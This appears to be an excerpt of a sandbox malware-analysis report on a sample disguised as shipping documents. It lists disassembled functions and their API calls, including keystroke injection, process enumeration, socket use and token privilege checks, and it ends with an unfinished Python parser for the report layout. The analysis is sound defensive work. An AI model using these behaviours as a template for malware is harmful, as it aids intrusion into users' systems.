                                                                                    • API ID: Variant$AllocClearCopyInitString
                                                                                    • String ID:
                                                                                    • API String ID: 2808897238-0
                                                                                    • Opcode ID: 2a1fa596b16ccce597928011ae1365c35d96645ce31591f3acdd478f2c5a5d91
                                                                                    • Instruction ID: 422887f989117446de1478ec2cfbcaf4b503272c12ba7526fc137160fc9febdd
                                                                                    • Opcode Fuzzy Hash: 2a1fa596b16ccce597928011ae1365c35d96645ce31591f3acdd478f2c5a5d91
                                                                                    • Instruction Fuzzy Hash: 9751B7B47083019ADB24AF65D89173AB3E5EF56310F28C89FE596D7291DB74D8408B01
                                                                                    APIs
                                                                                    • GetWindowRect.USER32(00D5DBC0,?), ref: 00BD9863
                                                                                    • ScreenToClient.USER32(00000002,00000002), ref: 00BD9896
                                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00BD9903
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                    • String ID:
                                                                                    • API String ID: 3880355969-0
                                                                                    • Opcode ID: 95b859bba75e903bdad6bcd69e8a00679b12e7a70f8ef912eb9e674c9a394c2b
                                                                                    • Instruction ID: ce2576db004739cd302633c6bd95ee27cdf058ad6ac1f17b6d70ab8013d48aef
                                                                                    • Opcode Fuzzy Hash: 95b859bba75e903bdad6bcd69e8a00679b12e7a70f8ef912eb9e674c9a394c2b
                                                                                    • Instruction Fuzzy Hash: 4B512E34A01205EFDF14CF58C890AAEBBF5FB46760F14819AF8559B3A0E731AD41DB90
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00BA9AD2
                                                                                    • __itow.LIBCMT ref: 00BA9B03
                                                                                      • Part of subcall function 00BA9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00BA9DBE
                                                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00BA9B6C
                                                                                    • __itow.LIBCMT ref: 00BA9BC3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$__itow
                                                                                    • String ID:
                                                                                    • API String ID: 3379773720-0
                                                                                    • Opcode ID: 33e075ef74df00d772e11ace1c54ca3f25f178585d4d769a8776ad38606ec4a6
                                                                                    • Instruction ID: 41de0057ec24aceab37786a28a768c0fba53756b935982b183fe03873a0931fa
                                                                                    • Opcode Fuzzy Hash: 33e075ef74df00d772e11ace1c54ca3f25f178585d4d769a8776ad38606ec4a6
                                                                                    • Instruction Fuzzy Hash: 2941AE70A04208ABDF25EF54D885BEE7BF9EF49711F0040E9F905A7291DB709A48DBA1
                                                                                    APIs
                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00BC69D1
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00BC69E1
                                                                                      • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                                                      • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00BC6A45
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00BC6A51
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$__itow__swprintfsocket
                                                                                    • String ID:
                                                                                    • API String ID: 2214342067-0
                                                                                    • Opcode ID: 94b495bce9c7026210bbc0792f6115c179fe15329956435873edde52c2c035e4
                                                                                    • Instruction ID: d19a5703215ab6517f5a8a36843ef04e90dd1aaa28c3f0d5bab5c08f5f98c64c
                                                                                    • Opcode Fuzzy Hash: 94b495bce9c7026210bbc0792f6115c179fe15329956435873edde52c2c035e4
                                                                                    • Instruction Fuzzy Hash: 46417C75640200AFEB60AF24CC86F7A77E4DB14B54F1484ECFE59AF2D2DAB19D048B91
                                                                                    APIs
                                                                                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00BDF910), ref: 00BC64A7
                                                                                    • _strlen.LIBCMT ref: 00BC64D9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _strlen
                                                                                    • String ID:
                                                                                    • API String ID: 4218353326-0
                                                                                    • Opcode ID: 572b3e56720792bed45bd604de3c11739261e44a9e995e3e11c5ca70f114cfae
                                                                                    • Instruction ID: ed19d482636c6d7fb125198e836fdbb7177227416636b06cd55d8fb2a0aefd4e
                                                                                    • Opcode Fuzzy Hash: 572b3e56720792bed45bd604de3c11739261e44a9e995e3e11c5ca70f114cfae
                                                                                    • Instruction Fuzzy Hash: F0418571904108ABCB14EBA4DCD5FBEB7E9AF54311F2481E9F91A97292DB30ED04CB51
                                                                                    APIs
                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00BBB89E
                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00BBB8C4
                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00BBB8E9
                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00BBB915
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                    • String ID:
                                                                                    • API String ID: 3321077145-0
                                                                                    • Opcode ID: bec12549fd1a91f05d0e8130838dc64f4a4369cdbcbed99725f2e4f1e9383f56
                                                                                    • Instruction ID: 4d4629bc6db0578237c1f6a490fcc52da41b01307c79b6c992d4d18068d3ad8b
                                                                                    • Opcode Fuzzy Hash: bec12549fd1a91f05d0e8130838dc64f4a4369cdbcbed99725f2e4f1e9383f56
                                                                                    • Instruction Fuzzy Hash: 8241F839600A11DFCB11EF15C495A69BBE1EF8A350F1980D9ED4AAB362CB70FD05CB91
                                                                                    APIs
                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00BD88DE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: InvalidateRect
                                                                                    • String ID:
                                                                                    • API String ID: 634782764-0
                                                                                    • Opcode ID: 46bebe05d0d62edfb1480d6a916f5a1da238e919cbb657ea147ce00ad358ea97
                                                                                    • Instruction ID: 68229a53e27b7bf606957fde51e477739ad15f4f812edd1f6b514f7773ec30df
                                                                                    • Opcode Fuzzy Hash: 46bebe05d0d62edfb1480d6a916f5a1da238e919cbb657ea147ce00ad358ea97
                                                                                    • Instruction Fuzzy Hash: 1031E534604108EFEB249A18DCA5FBCFBE5EB06312F944193F991D63E1EE35D9409752
                                                                                    APIs
                                                                                    • ClientToScreen.USER32(?,?), ref: 00BDAB60
                                                                                    • GetWindowRect.USER32(?,?), ref: 00BDABD6
                                                                                    • PtInRect.USER32(?,?,00BDC014), ref: 00BDABE6
                                                                                    • MessageBeep.USER32(00000000), ref: 00BDAC57
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1352109105-0
                                                                                    • Opcode ID: f15e12474e69360b45f19a398f47dfd5c0908aed430e2e98e54a5243a1f5f248
                                                                                    • Instruction ID: 92b4b032e3bafa4b72fd330bccd9e358a208f52caffe11d4d3bbc1a6dd1515d8
                                                                                    • Opcode Fuzzy Hash: f15e12474e69360b45f19a398f47dfd5c0908aed430e2e98e54a5243a1f5f248
                                                                                    • Instruction Fuzzy Hash: BC416E30610119DFDB11DF58D894BA9FBF5FB4A320F1880EAE8159B361E730E941CB92
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00BB0B27
                                                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00BB0B43
                                                                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00BB0BA9
                                                                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00BB0BFB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                    • String ID:
                                                                                    • API String ID: 432972143-0
                                                                                    • Opcode ID: 0b6350990623ef6f3f2788a1c4a71c1e65f08c0a87c36f5859e2c7909f538a4b
                                                                                    • Instruction ID: 48109fb24797549817fd45d59ea7f7cf3139a1f1ee535f7170efba4231213ccd
                                                                                    • Opcode Fuzzy Hash: 0b6350990623ef6f3f2788a1c4a71c1e65f08c0a87c36f5859e2c7909f538a4b
                                                                                    • Instruction Fuzzy Hash: 98314630D64208AFFB30AB658C05BFFBBE9EB45318F0842DAE491521E1D7F58940D751
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00BB0C66
                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00BB0C82
                                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00BB0CE1
                                                                                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00BB0D33
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                    • String ID:
                                                                                    • API String ID: 432972143-0
                                                                                    • Opcode ID: 1288ab0ba291cbce82373cea05a582886ac141b6ee44f6697c2fc0087a9f08ec
                                                                                    • Instruction ID: 832100f5e7d7f930f71154d310cc0199997c4eeb5d8abadb01d496cd5de36c72
                                                                                    • Opcode Fuzzy Hash: 1288ab0ba291cbce82373cea05a582886ac141b6ee44f6697c2fc0087a9f08ec
                                                                                    • Instruction Fuzzy Hash: 513146309642086FFF30AA658814BFFBFE6EB45320F0443ABE881521D1D7B599558751
                                                                                    APIs
                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B861FB
                                                                                    • __isleadbyte_l.LIBCMT ref: 00B86229
                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00B86257
                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00B8628D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                    • String ID:
                                                                                    • API String ID: 3058430110-0
                                                                                    • Opcode ID: e9759f2d23affa7b0a741bd051cdb290a9a325a7dc31c1656b480a45e855da7f
                                                                                    • Instruction ID: 2f965c09303f10921f210a15c93e872f26a801f390f14849dea16f97f2f2ecd0
                                                                                    • Opcode Fuzzy Hash: e9759f2d23affa7b0a741bd051cdb290a9a325a7dc31c1656b480a45e855da7f
                                                                                    • Instruction Fuzzy Hash: 9A31CD30604246AFDF22AF64CC48BBA7BE9FF41310F1540E9E824971A1EB31E950DB90
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32 ref: 00BD4F02
                                                                                      • Part of subcall function 00BB3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00BB365B
                                                                                      • Part of subcall function 00BB3641: GetCurrentThreadId.KERNEL32 ref: 00BB3662
                                                                                      • Part of subcall function 00BB3641: AttachThreadInput.USER32(00000000,?,00BB5005), ref: 00BB3669
                                                                                    • GetCaretPos.USER32(?), ref: 00BD4F13
                                                                                    • ClientToScreen.USER32(00000000,?), ref: 00BD4F4E
                                                                                    • GetForegroundWindow.USER32 ref: 00BD4F54
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                    • String ID:
                                                                                    • API String ID: 2759813231-0
                                                                                    • Opcode ID: a21059fe620662ef6173b96d31cd446aed25acff390b252ac2b5522ed045dd6b
                                                                                    • Instruction ID: ef64bbb4fdb1a28e3a18758f6777d5c4b9de4b8078e82128a75678d479eb71ed
                                                                                    • Opcode Fuzzy Hash: a21059fe620662ef6173b96d31cd446aed25acff390b252ac2b5522ed045dd6b
                                                                                    • Instruction Fuzzy Hash: A4310171D00108AFDB00EFA5C885AEFB7F9EF58300F1044AAE815E7251EB719E058BA0
                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00BB3C7A
                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00BB3C88
                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00BB3CA8
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00BB3D52
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                    • String ID:
                                                                                    • API String ID: 420147892-0
                                                                                    • Opcode ID: 9f72408431bb87bff2ef66aa8029493d2a8c12a344ad346b4d77a9c97555e29d
                                                                                    • Instruction ID: f5f4abf25ae61c05916f864eb3467b3f5a680cff59a95e588ec4ad4cce3a4f9a
                                                                                    • Opcode Fuzzy Hash: 9f72408431bb87bff2ef66aa8029493d2a8c12a344ad346b4d77a9c97555e29d
                                                                                    • Instruction Fuzzy Hash: 4431B1711083059FC301EF50D891BBFBBE8EF95354F4008ADF882861A1EFB19A49CB52
                                                                                    APIs
                                                                                      • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                                                                    • GetCursorPos.USER32(?), ref: 00BDC4D2
                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00B8B9AB,?,?,?,?,?), ref: 00BDC4E7
                                                                                    • GetCursorPos.USER32(?), ref: 00BDC534
                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00B8B9AB,?,?,?), ref: 00BDC56E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2864067406-0
                                                                                    • Opcode ID: 10ee2acc0bb627068e197cc2465b6fedaf30b3dc989d60de21562cc10f639d79
                                                                                    • Instruction ID: 7fbc241000135038ad5f8dc724c1522b03951703d867499f51a2364b6a4b0498
                                                                                    • Opcode Fuzzy Hash: 10ee2acc0bb627068e197cc2465b6fedaf30b3dc989d60de21562cc10f639d79
                                                                                    • Instruction Fuzzy Hash: E731A035600018EFCB158F98D899EEEBFF5EB4A314F0440A6F9058B3A1DB31AD50DBA4
                                                                                    APIs
                                                                                      • Part of subcall function 00BA810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00BA8121
                                                                                      • Part of subcall function 00BA810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00BA812B
                                                                                      • Part of subcall function 00BA810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA813A
                                                                                      • Part of subcall function 00BA810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA8141
                                                                                      • Part of subcall function 00BA810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA8157
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00BA86A3
                                                                                    • _memcmp.LIBCMT ref: 00BA86C6
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BA86FC
                                                                                    • HeapFree.KERNEL32(00000000), ref: 00BA8703
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 1592001646-0
                                                                                    • Opcode ID: 6b18ad5e18c4b435df752357e812ce088897064609b0811100afc636d27520e7
                                                                                    • Instruction ID: c8cac99c2fa3c07f7cfedddd4996b497d776d812b0d5ef0d7f6439acc3feffbd
                                                                                    • Opcode Fuzzy Hash: 6b18ad5e18c4b435df752357e812ce088897064609b0811100afc636d27520e7
                                                                                    • Instruction Fuzzy Hash: D8219071E45109EFEB10DFA8CA49BEEB7F8EF45305F158099E455A7240EB30AE09CB90
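The function summaries in this listing share one fixed layout: an APIs list giving each call as Name.MODULE(args), ref: address (with "Part of subcall function" marking calls reached through a callee), the memory dump source, and the Similarity block with API ID and Opcode ID. The Python script below is an added example, not part of the Joe Sandbox report or its tooling: it parses that layout into records and tags each function with the behaviour its API set implies, so that summaries such as the Toolhelp32 process walk and the TokenIntegrityLevel check above can be triaged without reading every block by hand. The behaviour rules, record field names and function names are the example's own assumptions; the embedded sample input is excerpted from those two summaries.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Sample input: two function summaries excerpted from the report listing,
# trimmed to the lines this parser uses (the line layout is unchanged).
SAMPLE = """\
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00BB3C7A
• Process32FirstW.KERNEL32(00000000,?), ref: 00BB3C88
• Process32NextW.KERNEL32(00000000,?), ref: 00BB3CA8
• CloseHandle.KERNEL32(00000000), ref: 00BB3D52
Memory Dump Source
• Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
• String ID:
• API String ID: 420147892-0
• Opcode ID: 9f72408431bb87bff2ef66aa8029493d2a8c12a344ad346b4d77a9c97555e29d
APIs
  • Part of subcall function 00BA810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00BA8121
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00BA86A3
• _memcmp.LIBCMT ref: 00BA86C6
• HeapFree.KERNEL32(00000000), ref: 00BA8703
Similarity
• API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
• Opcode ID: 6b18ad5e18c4b435df752357e812ce088897064609b0811100afc636d27520e7
"""

# One "• Name.MODULE(args), ref: ADDR" line; subcall lines also carry the callee address.
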